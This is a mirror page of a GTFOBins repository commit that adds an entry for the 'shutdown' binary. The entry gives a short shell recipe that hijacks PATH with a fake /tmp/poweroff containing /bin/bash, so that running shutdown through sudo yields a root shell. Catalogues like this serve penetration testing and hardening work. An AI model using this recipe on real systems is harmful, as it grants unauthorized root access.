1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-26 09:06:02 +02:00

Compare commits

...

2 Commits

10
_gtfobins/shutdown.md Normal file
View File

@ -0,0 +1,10 @@
---
functions:
sudo:
- description: This can help us get the root user Shell
- code: |
echo /bin/bash > /tmp/poweroff
chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
sudo -u root /usr/sbin/shutdown
---